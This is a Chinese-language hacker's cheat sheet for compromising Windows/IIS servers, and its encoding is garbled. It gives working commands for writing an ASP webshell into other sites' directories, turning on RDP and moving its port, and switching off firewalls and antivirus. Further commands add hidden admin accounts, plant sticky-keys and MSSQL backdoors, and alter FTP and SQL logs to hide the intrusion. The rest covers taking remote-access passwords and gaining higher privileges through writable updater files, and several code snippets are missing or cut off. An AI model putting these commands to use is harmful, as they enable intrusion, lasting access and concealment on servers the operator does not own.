旁站路徑問(wèn)題: 1、讀網(wǎng)站配置。 2、用以下VBS:
3、iis_spy 列舉(注:需要支持ASPX,反IISSPY的方法:將 activeds.dll,activeds.tlb 降權(quán))。 4、得到目標(biāo)站目錄,不能直接跨的。可以通過(guò)“echo ^<%execute(request(“cmd”))%^> >>X:\目標(biāo)目錄\X.asp”或者“copy 腳本文件 X:\目標(biāo)目錄\X.asp”像目標(biāo)目錄寫(xiě)入webshell,或者還可以試試type命令。 |
WordPress 的平臺(tái),爆絕對(duì)路徑的方法是: url/wp-content/plugins/akismet/akismet.php |
phpMyAdmin 爆路徑辦法: phpMyAdmin/libraries/select_lang.lib.php |
網(wǎng)站可能目錄(注:一般是虛擬主機(jī)類(lèi)): data/htdocs.網(wǎng)站/網(wǎng)站/ |
CMD 下操作 VPN 相關(guān)知識(shí)、資料: #允許administrator撥入該VPN: #禁止administrator撥入該VPN: #查看哪些用戶可以撥入VPN: #查看VPN分配IP的方式: #使用地址池的方式分配IP: #地址池的范圍是從192.168.3.1到192.168.3.254: |
Cmd、Dos 命令行下添加 SQL 用戶的方法: 需要有管理員權(quán)限,在命令下先建立一個(gè)“c:\test.qry”文件,內(nèi)容如下: exec master.dbo.sp_addlogin test,123 然后在DOS下執(zhí)行:cmd.exe /c isql -E /U alma /P /i c:\test.qry 另類(lèi)的加用戶方法: 在刪掉了 net.exe 和不用 adsi 之外,新的加用戶的方法。代碼如下: js: vbs: |
Cmd 訪問(wèn)控制權(quán)限控制: 命令如下: cacls c: /e /t /g everyone:F #c盤(pán)everyone權(quán)限 備注: 反制方法,在文件夾安全設(shè)置里將 Everyone 設(shè)定為不可讀,如果沒(méi)有安全性選項(xiàng):工具 – 文件夾選項(xiàng) – 使用簡(jiǎn)單的共享去掉即可。 |
3389 相關(guān),以下配合PR更好: a、防火墻TCP/IP篩選.(關(guān)閉:net stop policyagent & net stop sharedaccess) 1.查詢終端端口: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber 2.開(kāi)啟XP&2003終端服務(wù): REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 3.更改終端端口為2008(十六進(jìn)制為:0x7d8): REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f 4.取消xp&2003系統(tǒng)防火墻對(duì)終端服務(wù)的限制及IP連接的限制: REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f create table a (cmd text); BS馬的PortMap功能,類(lèi)似LCX做轉(zhuǎn)發(fā)。若果支持ASPX,用這個(gè)轉(zhuǎn)發(fā)會(huì)隱蔽點(diǎn)。(注:一直忽略了在偏僻角落的那個(gè)功能) |
關(guān)閉常見(jiàn)殺軟(把殺軟所在的文件的所有權(quán)限去掉): 處理變態(tài)諾頓企業(yè)版: net stop “Symantec AntiVirus” /y 麥咖啡:net stop “McAfee McShield” Symantec病毒日志: Symantec病毒備份: Nod32病毒備份: Nod32移除密碼保護(hù): |
安裝5次shift后門(mén),沾滯鍵后門(mén),替換SHIFT后門(mén): 5次SHIFT,沾滯鍵后門(mén): 替換SHIFT后門(mén): |
添加隱藏系統(tǒng)賬號(hào): 1、執(zhí)行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。 |
安裝 MSSQL 擴(kuò)展后門(mén): USE master; |
處理服務(wù)器MSFTP日志: 在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三個(gè)文件,直接刪除 ex0111124.log 不成功,顯示“原文件…正在使用”。 當(dāng)然可以直接刪除“ex011120.log / ex011121.log”。然后用記事本打開(kāi)“ex0111124.log”,刪除里面的一些內(nèi)容后,保存,覆蓋退出,成功。 當(dāng)停止“msftpsvc”服務(wù)后可直接刪除“ex011124.log”。 |
MSSQL查詢分析器連接記錄清除: MSSQL 2000 位于注冊(cè)表如下: HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers 找到接接過(guò)的信息刪除。 MSSQL 2005 是在: C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat |
防BT系統(tǒng)攔截技巧,可以使用遠(yuǎn)程下載shell:
防BT系統(tǒng)攔截技巧,可以使用遠(yuǎn)程下載shell,也達(dá)到了隱藏自身的效果,也可以做為超隱蔽的后門(mén),神馬的免殺webshell,用服務(wù)器安全工具一掃通通掛掉了。 |
VNC、Radmin、PcAnywhere 的提權(quán)方法: 首先利用 shell 讀取 vnc 保存在注冊(cè)表中的密文,然后再使用工具VNC4X破解。 注冊(cè)表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password Radmin 默認(rèn)端口是4899,先獲取密碼和端口,如下位置: HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默認(rèn)密碼注冊(cè)表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默認(rèn)端口注冊(cè)表位置 然后用HASH版連接。 如果我們拿到一臺(tái)主機(jī)的WEBSEHLL。通過(guò)查找發(fā)現(xiàn)其上安裝有 PcAnywhere 同時(shí)保存密碼文件的目錄是允許我們的IUSER權(quán)限訪問(wèn),我們可以下載這個(gè)CIF文件到本地破解,再通過(guò) PcAnywhere 從本機(jī)登陸服務(wù)器。 保存密碼的CIF文件,不是位于PcAnywhere的安裝目錄,而且位于安裝PcAnywhere所安裝盤(pán)的: “\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\” 如果PcAnywhere安裝在“D:\program\”文件夾下,那么PcAnywhere的密碼文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夾下。 |
搜狗輸入法 PinyinUp.exe 提權(quán): 搜狗輸入法的“PinyinUp.exe”是可讀可寫(xiě)的直接替換即可,位于搜狗安裝目錄下,例如: “C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe” 搜狗拼音輸入法,會(huì)定時(shí)調(diào)用這個(gè)文件進(jìn)行升級(jí),禁止還禁止不掉,呵呵,天然的后門(mén)。 |
WinWebMail 提權(quán)加用戶: WinWebMail目錄下的web必須設(shè)置everyone權(quán)限可讀可寫(xiě),在開(kāi)始程序里,找到WinWebMail快捷方式,接下來(lái),看路徑,訪問(wèn)“路徑\web”傳 shell,訪問(wèn)shell后,權(quán)限是system,直接放遠(yuǎn)控進(jìn)啟動(dòng)項(xiàng),等待下次重啟。 沒(méi)有刪cmd組件的可以直接加用戶,7i24的web目錄也是可寫(xiě),權(quán)限為administrator。 |
1433 SA權(quán)限構(gòu)建注入點(diǎn): <% |